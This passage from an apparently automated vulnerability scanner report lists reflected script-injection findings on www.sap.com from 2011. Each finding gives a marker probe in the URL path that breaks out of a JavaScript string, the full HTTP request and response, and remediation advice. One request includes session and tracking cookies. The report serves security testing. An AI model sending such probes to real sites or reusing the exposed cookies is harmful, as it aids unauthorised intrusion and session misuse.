...[SNIP]...

1.70. http://www.sap.com/global/client_functions.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/client_functions.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfdc8'%3b7972640c05a was submitted in the REST URL parameter 1. This input was echoed as cfdc8';7972640c05a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalcfdc8'%3b7972640c05a/client_functions.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34196
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalcfdc8';7972640c05a';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.71. http://www.sap.com/global/css/Flyouts.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/css/Flyouts.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a67'%3bfd99d1a36d0 was submitted in the REST URL parameter 1. This input was echoed as 17a67';fd99d1a36d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global17a67'%3bfd99d1a36d0/css/Flyouts.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34150
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global17a67';fd99d1a36d0';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.72. http://www.sap.com/global/css/MainContentPanel.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/css/MainContentPanel.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19826'%3b0257c2c66d3 was submitted in the REST URL parameter 1. This input was echoed as 19826';0257c2c66d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global19826'%3b0257c2c66d3/css/MainContentPanel.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34245
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:59 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:59 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global19826';0257c2c66d3';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.73. http://www.sap.com/global/css/MainLeftPanel.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/css/MainLeftPanel.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35eda'%3bedbf9da7bbb was submitted in the REST URL parameter 1. This input was echoed as 35eda';edbf9da7bbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global35eda'%3bedbf9da7bbb/css/MainLeftPanel.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:59 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:59 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global35eda';edbf9da7bbb';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.74. http://www.sap.com/global/css/MainRightPanel.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/css/MainRightPanel.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51e02'%3b12717624626 was submitted in the REST URL parameter 1. This input was echoed as 51e02';12717624626 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global51e02'%3b12717624626/css/MainRightPanel.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global51e02';12717624626';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.75. http://www.sap.com/global/css/dropdownlist.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/css/dropdownlist.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8914c'%3b731e10a56e3 was submitted in the REST URL parameter 1. This input was echoed as 8914c';731e10a56e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global8914c'%3b731e10a56e3/css/dropdownlist.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:01 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global8914c';731e10a56e3';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.76. http://www.sap.com/global/css/rm_css/rm_iframe_css.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/css/rm_css/rm_iframe_css.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b6eb'%3bb5fb07c6ddc was submitted in the REST URL parameter 1. This input was echoed as 7b6eb';b5fb07c6ddc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global7b6eb'%3bb5fb07c6ddc/css/rm_css/rm_iframe_css.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34268
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global7b6eb';b5fb07c6ddc';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.77. http://www.sap.com/global/js/FormEngine.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/FormEngine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49fd6'%3bdd65a3fcd1e was submitted in the REST URL parameter 1. This input was echoed as 49fd6';dd65a3fcd1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global49fd6'%3bdd65a3fcd1e/js/FormEngine.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34174
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:43 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:43 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global49fd6';dd65a3fcd1e';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.78. http://www.sap.com/global/js/addthis_widget.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/addthis_widget.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21ae8'%3b7885f86171f was submitted in the REST URL parameter 1. This input was echoed as 21ae8';7885f86171f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global21ae8'%3b7885f86171f/js/addthis_widget.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:39 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:39 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global21ae8';7885f86171f';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.79. http://www.sap.com/global/js/client_player.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/client_player.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 494b8'%3b3f9e794eca6 was submitted in the REST URL parameter 1. This input was echoed as 494b8';3f9e794eca6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global494b8'%3b3f9e794eca6/js/client_player.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/about-sap/events/search/overview/index.epx?EventID=8193
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34195
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:19:15 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:19:15 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:19:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global494b8';3f9e794eca6';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.80. http://www.sap.com/global/js/dropdownlist.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/dropdownlist.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f57fc'%3bc7151b9655c was submitted in the REST URL parameter 1. This input was echoed as f57fc';c7151b9655c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalf57fc'%3bc7151b9655c/js/dropdownlist.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34188
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalf57fc';c7151b9655c';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.81. http://www.sap.com/global/js/jquery-1_3_2/jquery-1.3.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/jquery-1_3_2/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b81'%3bb6b8c9dfd1 was submitted in the REST URL parameter 1. This input was echoed as c9b81';b6b8c9dfd1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalc9b81'%3bb6b8c9dfd1/js/jquery-1_3_2/jquery-1.3.2.min.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34321
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalc9b81';b6b8c9dfd1';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.82. http://www.sap.com/global/js/menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/menu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0692'%3bc051f703da5 was submitted in the REST URL parameter 1. This input was echoed as a0692';c051f703da5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globala0692'%3bc051f703da5/js/menu.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34116
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:46 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globala0692';c051f703da5';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.83. http://www.sap.com/global/js/remote.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/remote.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adae'%3bc4f39aa5a5b was submitted in the REST URL parameter 1. This input was echoed as 8adae';c4f39aa5a5b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global8adae'%3bc4f39aa5a5b/js/remote.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
